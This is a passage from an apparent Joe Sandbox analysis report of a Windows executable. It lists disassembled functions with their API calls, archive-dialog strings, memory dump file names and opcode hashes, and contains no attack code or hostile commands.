                                  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                                • GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                • API String ID: 2141747552-1753850145
                                • Opcode ID: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                                • Instruction ID: 156a39994be617e21082af6f2ffd6e6b7970c1446ab25fa66627276f0493932f
                                • Opcode Fuzzy Hash: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                                • Instruction Fuzzy Hash: ADE04678800751AFCF209F3D9808B42BFE4AB14710B04C81EE4DAE3280EAB5D5888F70
                                Function 00D87DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                                • Instruction ID: a26ea2aa57907dac0bc7edceb1f6e1d83abe4507eda251acc7f56da3c284774e
                                • Opcode Fuzzy Hash: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                                • Instruction Fuzzy Hash: D441A332A003049FDB25EF78C881A5EB7B6EF89714F6545A9E515EB341EB31ED01CBA0
                                Function 00D8B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 00D8B619
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8B63C
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8B662
                                • _free.LIBCMT ref: 00D8B675
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8B684
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                                • Instruction ID: 92e238de642403accd595decf680bec1ba5bf7d963aaf6d5e785ba89cde9803b
                                • Opcode Fuzzy Hash: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                                • Instruction Fuzzy Hash: 650175A2601715BB632126B65C49C7B6A6DDEC6BB1319022BB904D6210EF60CD0192B4
                                Function 00D89029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,?,00D8895F,00D885FB,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D8902E
                                • _free.LIBCMT ref: 00D89063
                                • _free.LIBCMT ref: 00D8908A
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D89097
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D890A0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: f98a27060bf5ae7744c59bc3cb283f6e8f0efee186c7ef32c0fc849daaed72a2
                                • Instruction ID: 080bea547649883323336b90d84bfa12bb5b89632be34a115edf02345160af78
                                • Opcode Fuzzy Hash: f98a27060bf5ae7744c59bc3cb283f6e8f0efee186c7ef32c0fc849daaed72a2
                                • Instruction Fuzzy Hash: 9601F476505B006A93227B396C96E3BA76EDBC137172C012AF589D2392EF61CC016370
                                Function 00D7075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D70A41: ResetEvent.KERNEL32(?), ref: 00D70A53
                                  • Part of subcall function 00D70A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D70A67
                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D7078F
                                • CloseHandle.KERNEL32(?,?), ref: 00D707A9
                                • DeleteCriticalSection.KERNEL32(?), ref: 00D707C2
                                • CloseHandle.KERNEL32(?), ref: 00D707CE
                                • CloseHandle.KERNEL32(?), ref: 00D707DA
                                  • Part of subcall function 00D7084E: WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                                  • Part of subcall function 00D7084E: GetLastError.KERNEL32(?), ref: 00D70860
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                • String ID:
                                • API String ID: 1868215902-0
                                • Opcode ID: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                                • Instruction ID: 6390b166a34c2e5d336d49015376f2b3d3a535cf3b4ed7f632a1de1dffd0f67a
                                • Opcode Fuzzy Hash: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                                • Instruction Fuzzy Hash: 24015E72540704EFCB229F69DD85F86BBE9FB49710F00452AF16E822A4DB756A44CBB0
                                Function 00D8BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00D8BF28
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D8BF3A
                                • _free.LIBCMT ref: 00D8BF4C
                                • _free.LIBCMT ref: 00D8BF5E
                                • _free.LIBCMT ref: 00D8BF70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                                • Instruction ID: 44d1bf2554cfa37d23cd3a5bb42f2da04a0c792b9fb9d18c48a672a6d95f6a01
                                • Opcode Fuzzy Hash: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                                • Instruction Fuzzy Hash: 57F0AF73508205AB8620FB68EE86C1A77DAFE047607A84806F549D7A55CF35FC819BB4
                                Function 00D88060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00D8807E
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D88090
                                • _free.LIBCMT ref: 00D880A3
                                • _free.LIBCMT ref: 00D880B4
                                • _free.LIBCMT ref: 00D880C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                                • Instruction ID: 3fee461336e5da61cdc9c96908afee0cab5454a41c6dc1abc84e3ef2abf8a095
                                • Opcode Fuzzy Hash: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                                • Instruction Fuzzy Hash: A5F0177E8013378B9711BB19BC028197B66F716720348470AF410D6B72CB310861AFF5
                                Function 00D876BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\5P9EdUgv5r.exe,00000104), ref: 00D876FD
                                • _free.LIBCMT ref: 00D877C8
                                • _free.LIBCMT ref: 00D877D2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\5P9EdUgv5r.exe
                                • API String ID: 2506810119-2748917032
                                • Opcode ID: cdece0b76f775a5b0c1ae4a889fd73734ed258dd12913622477d01c2356b1240
                                • Instruction ID: b5ab592ec0b6392d82eee76fb0dbab2e31cd05afb875d2a813e966dedcb4f84e
                                • Opcode Fuzzy Hash: cdece0b76f775a5b0c1ae4a889fd73734ed258dd12913622477d01c2356b1240
                                • Instruction Fuzzy Hash: 63315C75A04219AFDB21FB999D81DAEBBECEB85710F284066E80497211D6708E40DBB0
                                Function 00D67574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D67579
                                  • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D67640
                                  • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                                  • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                                  • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                • API String ID: 3813983858-639343689
                                • Opcode ID: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                                • Instruction ID: 3339d29a7f56e7b17e4a5945cbcb5fe9a03c7f638df5cc64ebf263f604f7baeb
                                • Opcode Fuzzy Hash: eecbc157927e8a3a37f9a25ba7d4fd9c3663ed0efb9b6be9d1a783ca55634de8
                                • Instruction Fuzzy Hash: 9D317071908249AFDF20EBA8DC41BEEBB69EF15358F048055F449E7292DB744A44CB71
                                Function 00D7A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7A4B8
                                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D7A4CD
                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7A4E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText$DialogWindow
                                • String ID: ASKNEXTVOL
                                • API String ID: 445417207-3402441367
                                • Opcode ID: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                                • Instruction ID: 7920f50b5f7a6272c662504805992e69cfe52b42d685ad9abc653b153e30f228
                                • Opcode Fuzzy Hash: d1ff05f600aee178bcae8318bb17a1c2414fe742bf58c34e7ae3cb5eb1d2b9ec
                                • Instruction Fuzzy Hash: B311D632244302AFD7219F6C9D0DF6A3B69EB86305F184005F34DDB1A0D7A29D11D736
                                Function 00D6D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: __fprintf_l_strncpy
                                • String ID: $%s$@%s
                                • API String ID: 1857242416-834177443
                                • Opcode ID: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                                • Instruction ID: c35d67a273df8df1feb2d1f70cae6971f4c089765bed1f4c7ae738a104c6ca49
                                • Opcode Fuzzy Hash: 9934f6f30900b458e4df4970a6e5f05098c80045a27677814bcfb8c284bb0818
                                • Instruction Fuzzy Hash: 47216F72940348AFDF20DEA4EC06FEE7BA9EF09300F040512FE1496191E371DA599B75
                                Function 00D7A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7A9DE
                                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D7A9F6
                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D7AA24
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText$DialogWindow
                                • String ID: GETPASSWORD1
                                • API String ID: 445417207-3292211884
                                • Opcode ID: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                                • Instruction ID: 6add612976dcfd769fdf60df70d2ac37941b50305c0ded6ca73ef96bf6196d53
                                • Opcode Fuzzy Hash: 883aa8bfc55ef2364cd6db62a0fece17018e7be2553af1d7c68c1b78611c3b25
                                • Instruction Fuzzy Hash: 9A114833940219BBDB219A689D09FFE773CEB89310F044011FB89F2180E261DD51DB72
                                Function 00D6B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • _swprintf.LIBCMT ref: 00D6B51E
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • _wcschr.LIBVCRUNTIME ref: 00D6B53C
                                • _wcschr.LIBVCRUNTIME ref: 00D6B54C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _wcschr$__vswprintf_c_l_swprintf
                                • String ID: %c:\
                                • API String ID: 525462905-3142399695
                                • Opcode ID: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                                • Instruction ID: c7cd015a18e968747e2972075988943c5fdbdffa9d180b2024c94c7791f786c7
                                • Opcode Fuzzy Hash: 00608b110025e12610f955855194b2605963fc497eaf323395b71b4dc2659974
                                • Instruction Fuzzy Hash: 7201D263914311ABCB20ABA59C82CABB7ACEE957B07544417F986C6081FB20D984C3B1
                                Function 00D706BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706F3
                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D706FD
                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D6ABC5,00000008,?,00000000,?,00D6CB88,?,00000000), ref: 00D7070D
                                Strings
                                • Thread pool initialization failed., xrefs: 00D70725
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                • String ID: Thread pool initialization failed.
                                • API String ID: 3340455307-2182114853
                                • Opcode ID: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                                • Instruction ID: b592857f458d8311fe9a424cd51cfc25125e59518591e8e0d7279fedf831e0aa
                                • Opcode Fuzzy Hash: 98b6fac6f54a0652bf594d0fb96127b475f47919d5a60bdea478eb88b03de314
                                • Instruction Fuzzy Hash: AC1170B1604708AFC3315F65D884AABFBECEB95755F10882EF1DEC2241E6716980CB70
                                Function 00D7D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: RENAMEDLG$REPLACEFILEDLG
